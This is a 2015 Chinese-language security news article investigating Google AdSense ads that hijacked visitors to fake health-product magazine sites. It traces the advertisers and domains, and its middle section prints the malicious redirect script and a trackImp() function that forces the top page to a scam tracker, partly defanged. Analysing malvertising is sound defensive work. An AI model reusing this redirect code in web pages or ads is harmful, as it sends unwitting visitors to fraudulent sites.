深入調查:當谷歌廣告聯盟(Google AdSense)廣告遭遇惡意利用
責編:admin |2015-01-20 13:54:16安全研究人員最近注意到大量的網站被莫名其妙地跳轉到某幾個特定的網站,經過調查,罪魁禍首居然是谷歌廣告聯盟(Google AdSense)。
上周末,我們注意到大量站長的網站都被跳轉到了某個“雜志網站”,有些用戶點擊鏈接或者載入新網頁時會被隨機地跳轉。這些用戶都稱,打開網頁會顯示個一兩秒,然后就會跳轉了。
lemode-mgz .com假冒“福布斯”
我們對這些網站進行了安全檢測,但我們在網站服務器端沒有找到任何問題。從這些受害網站的癥狀——先載入網頁,幾秒鐘后跳轉,表明這些是瀏覽器客戶端方面的重定向。要么是什么JavaScript要么是Meta刷新標簽導致的重定向。
可是我們在網站上沒有找到能夠修改網頁HTML或者JavaScript的東西,所以重定向應該是第三方腳本導致的。
谷歌廣告聯盟惹的禍
惡意廣告是一個麻煩的問題。這些廣告很難追查。因為廣告是針對性投放的(廣告商會根據不同的地理位置、用戶使用的是手機還是電腦,3G還是Wi-Fi,用戶的瀏覽記錄等投放不同的廣告),因此不同的用戶會看到不同的廣告,不同的廣告活動活躍時間也各不相同。
另外,廣告腳本往往會加載多個其他網站的內容。例如,我們最近接觸到的一個網站,它的主頁中包含8個不同的第三方腳本(包括廣告和網頁小插件)——當瀏覽器載入網站時,那個網頁會向249個其他域名上的資源發送上千個HTTP請求。可能這是一個比較極端的例子,但廣告腳本向30-40個域名發送請求的情況還是相當正常的。
盡管如此,我們還是得找到具體問題出在哪里。
如果你對惡意廣告的網址進行搜索,就會發現大量討論這些重定向的帖子。
搜索這個重定向地址(lemode-mgz .com)能夠得到很多結果,在眾多的帖子和博文中,我們找到了這篇谷歌官方廣告聯盟(Google AdSense)幫助論壇的帖子,帖子中有超過150條信息,記錄了重定向的特點和來源。
這種惡意重定向甚至出現在了Google AdSense控制臺的廣告查看中心。這些問題從2014年12月下半旬開始持續了一個月,但真正開始大范圍傳播是從2015年1月9日。
追蹤惡意廣告
帶有AdSense廣告(非文字廣告)的網站會隨機地將訪客定向到那些“揭開健康秘密”的假冒網站,如:皮膚保養、抗衰老、提高智力還有減肥產品等。這些假冒網站會偽裝成非常知名的(通常是虛構的)博客和雜志,例如:《福布斯》、《時尚好管家》、《醫生》、《媽咪健康報》等。他們看起來像是有明星做廣告的,把重大科學研究成果作為頭條的雜志,還有很多水軍評論稱這些產品很有效。
所有的這些假網站都是在lemode-mgz .com、consumernews247 .com和wan-tracker .com的不同子域名下。所有的鏈接都會指向track .securevoluum .com/click,但是如果你直接訪問這些網站,就什么也看不見,只有空白頁。
域名都是大概一個月前注冊的:
lemode-mgz .com — 創建于2014-12-14
securevoluum .com — 創建于2014-12-15
wan-tracker .com — 創建于2014-12-14
consumernews247 .com — 創建于2013-09-02 更新于2014-12-24
track .securevoluum .com是hfrov .voluumtrk .com的別名,而voluumtrk.com創建于2014-08-06.
這些網站的whois信息都是被保護的,域名都托管在亞馬遜的EC2和S3。
查找源頭
Google沒有及時解決問題,站長們坐不住了,他們開始聯合起來試圖解決問題。解決問題的過程中,他們發現Google AdSense官網“廣告查看中心”同樣存在重定向現象。如視頻所示,站長們在廣告查看中心看到惡意廣告時,會被重定向。
一位論壇用戶提供的跳轉視頻
土豆觀看
如果站長點擊瀏覽器中的“后退”按鈕,他們就會返回到含有惡意廣告的頁面。但他們手速得要足夠快,才能夠在再次被重定向之前截好圖。
僅僅對含有惡意廣告的網頁進行截圖是不夠的,因為那個網頁還是會包含很多來自不同廣告商的廣告。所以下一步就是要對圖片進行裁剪,把單個的廣告截下來交給廣告查看中心過濾篩選(和Google圖片搜索很類似,它通過你提供的照片尋找那些廣告)。如果篩選出的廣告發生了重定向跳轉,那這個廣告就應該是惡意廣告了。
確定劫持方式
通過這樣的方式,站長們最終找到了這些了惡意廣告。
匿名廣告商adv-2646721236434373,廣告會重定向到adwynn .com。還有Blackburn ART,其廣告指向rgeoffreyblackburn .com。
這兩個賬號都使用正規的AdWords賬號,廣告看起來也挺正常。我認為是騙子通過什么方法劫持了它們——可能是竊取到了他們的用戶名密碼。
另一種可能是,騙子們自己創建了這些賬號并偽裝成正規網站。為了調查事情真相,我嘗試給adwynn.com域名的持有者發了郵件,但他們沒有回復我。直到1月13日,我發現Google還是沒有屏蔽這兩個賬號,但他們的廣告不再重定向了,應該能夠間接證明這兩個賬號都是正常賬號。
惡意重定向代碼
有人做了深度調查,查明了惡意廣告重定向的工作原理:
我覺得我找到了重定向鏈接的源代碼。我查看了adwynne.com廣告的代碼。
這是廣告里的腳本元素:
<script src="hxxps://adwynne728us. wan-tracker .com/track-imp/g/bs01/adwynne728us/track.php?it=1420998670014&refurl=https%3A%2F%2Fwww.google.com%2Fadsense%2Fapp%3Fhl%3Den%26subid%3D…skipped…">
這段腳本會加載adwynne728us .wan-tracker .com的鏈接,鏈接的內容是:
function trackImp() { window.top.location.href = 'hxxp://track .securevoluum .com/421c6fa2-56dc-4806-b48a-6b536e9f021f?account=adwynne&campaign=us&adgroup=1&banner=728-90&it=1420998670014&refurl=https%3A%2F%2Fwww.google.com%2Fadsense%2Fapp%3Fhl%3Den%26subid%3D….skipped…'; } trackImp();
這個trackImp()函數會加載一個track .securevolumm .com的鏈接,又會重定向至此:
hxxp://lemode-mgz .com/sc/10056/special-report.html?voluumdata=vid..00000006-a37f-49df-8000-000000000000__vpid..4728a800-99b3-11e4-8482-3005c6fcc558__caid..421c6fa2-56dc-4806-b48a-6b536e9f021f__lid…skipped…
Google為什么默許惡意代碼?
我很好奇Google為什么默許這些廣告商使用惡意代碼,例如未授權的重定向。
而事實上這些廣告在Google審核階段不會有任何的惡意行為,但是一旦通過就開始行為不端了。我認為無論如何,應該要對這些第三方腳本進行控制。腳本可以和瀏覽器exploit配合起來攻擊訪客。如果Google不對這些廣告中的腳本加以控制,AdSense可能最終會變成最大的惡意廣告平臺。
這些惡意廣告還可以被用來攻擊那些已經登陸的Google Adsense用戶。黑客可以嘗試構造CSRF和XSS攻擊,攻擊那些登錄Google賬戶的用戶。